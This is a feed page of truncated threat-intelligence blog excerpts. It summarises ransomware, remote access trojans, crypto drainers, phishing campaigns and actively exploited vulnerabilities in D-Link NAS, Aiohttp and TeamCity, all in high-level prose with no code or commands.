Key Takeaways Cyble Research & Intelligence Labs (CRIL) identified a DragonForce ransomware binary based on LOCKBIT Black ransomware, suggesting the threat actors behind DragonForce used a leaked builder of LOCKBIT Black ransomware to generate their binary.  In September 2022, an X (Twitter) user shared the download link for the LockBit ransomware builder, which allows threat actors to customize ransomware payloads according to their preferences.  A comparison between binaries generated using the Leaked Builder of LOCKBIT ransomware and DragonForce ransomware revealed significa ..read more

TransparentTribe primarily targets Indian government organizations, military personnel, and defense contractors. Its objective is usually to gather sensitive information, conduct cyber espionage, and compromise the security of its targets.   TransparentTribe is known to have exploited various platforms, including Windows and Android, in their endeavours. The threat actors often create fake websites and documents that mimic legitimate government entities or organizations. This can trick targeted users into revealing credentials or downloading malware onto their systems. It has also u ..read more

Cyble Global Sensor Intelligence observed active exploitation of critical D-Link Vulnerability  Recently, the security community has raised concerns regarding the vulnerabilities found in D-Link Network Attached Storage (NAS) devices. The vulnerabilities, identified as CVE-2024-3272 and CVE-2024-3273 were disclosed initially by an individual who goes by the alias "netsecfish" on GitHub on March 26, 2024. D-Link disclosed the same on April 4, 2024.   The March 26 GitHub post highlighted that the malicious HTTP request is aimed at exploiting the vulnerable endpoint of affected D ..read more

Key Takeaways Cyble Research and Intelligence Labs (CRIL) has uncovered a novel phishing campaign tailored to cryptocurrency users. This campaign was deploying a well-known FatalRAT along with additional malware such as Clipper and Keylogger. The Threat Actors (TAs) orchestrating this campaign employ the DLL side-loading technique to load and execute FatalRAT, Clipper, and Keylogger modules. FatalRAT is a Remote Access Trojan that provides attackers with control over the victim's computer and is equipped with extensive capabilities for stealing sensitive information. The inclusion of a clipp ..read more

Key Takeaways Threat actors (TAs) are actively exploiting platforms like Google Ads and social media platforms such as X (formerly Twitter) to disseminate crypto drainers, employing tactics such as compromising famous accounts, generating counterfeit profiles, and using malicious advertisements.  Cyble Research and Intelligence Labs (CRIL) found multiple drainer source codes leaked on cybercrime forums, including a recent leak of a Solana drainer's source code.  The release of malware source code into the wild enables the creation of new variants. With multiple drainer’s source cod ..read more

Key Takeaways In February, the FBI took down the WarzoneRAT malware operation, seizing its infrastructure and arrested two individuals linked to the cybercrime operation.  Recently, Cyble Research and Intelligence Labs (CRIL) observed few samples of malware campaign possibly distributed via tax-themed spam emails, deploying WarzoneRAT (Avemaria) as the final payload.  In first case, the compressed attachment contains a LNK file that downloads an HTA file, initiating a PowerShell command to download a VBScript file.   This VBScript is further downloading and executing the ..read more

CGSI captures potential exploitation of an Aiohttp vulnerability by the ShadowSyndicate Group. The post CGSI Probes: ShadowSyndicate Group’s Possible Exploitation of Aiohttp Vulnerability (CVE-2024-23334)  appeared first on Cyble ..read more

CRIL analyzes Xehook stealer and it's evolution from Cinoshi project. The post Xehook Stealer: Evolution of Cinoshi’s Project Targeting Over 100 Cryptocurrencies and 2FA Extensions appeared first on Cyble ..read more

Cyble analyzes the Pig-butchering scam targeting Indian investors by distributing fake trading apps via Google Play Store and App Store. The post The Spreading Wave of Pig-Butchering Scams in India appeared first on Cyble ..read more

Cyble Global Sensor Intelligence observes active exploitation of JetBrains TeamCity Authentication Bypass vulnerability. The post JetBrains TeamCity Authentication Bypass vulnerability under Active Exploitation appeared first on Cyble ..read more